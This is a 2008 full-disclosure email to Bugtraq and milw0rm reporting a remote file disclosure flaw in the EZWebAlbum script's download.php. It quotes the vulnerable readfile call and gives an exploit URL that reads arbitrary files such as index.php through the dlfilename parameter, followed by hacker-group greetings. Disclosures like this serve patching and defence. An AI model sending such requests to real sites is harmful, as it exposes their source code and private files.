
Date: Sun, 20 Jul 2008 15:12:09 +0300
From: Ghost hacker <ghost-r00t@...mail.com>
To: السيكروتي فوكس <bugtraq@...urityfocus.com>,
	ستروك <submit@...w0rm.com>,
	جيكو <jalikom@...mail.com>
Subject: EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability



##################################################################################################
 EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
 Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
 My Site web : Real-hack.Net                                      |/     /\     \|
##################################################################################################
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : Ghost-r00t@...mail.com
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
###################################### [ Viva IslaM & KSA ] ######################################
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http://xxxx/[path]/download.php?dlfilename=EVIL
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##################################################################################################
 Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/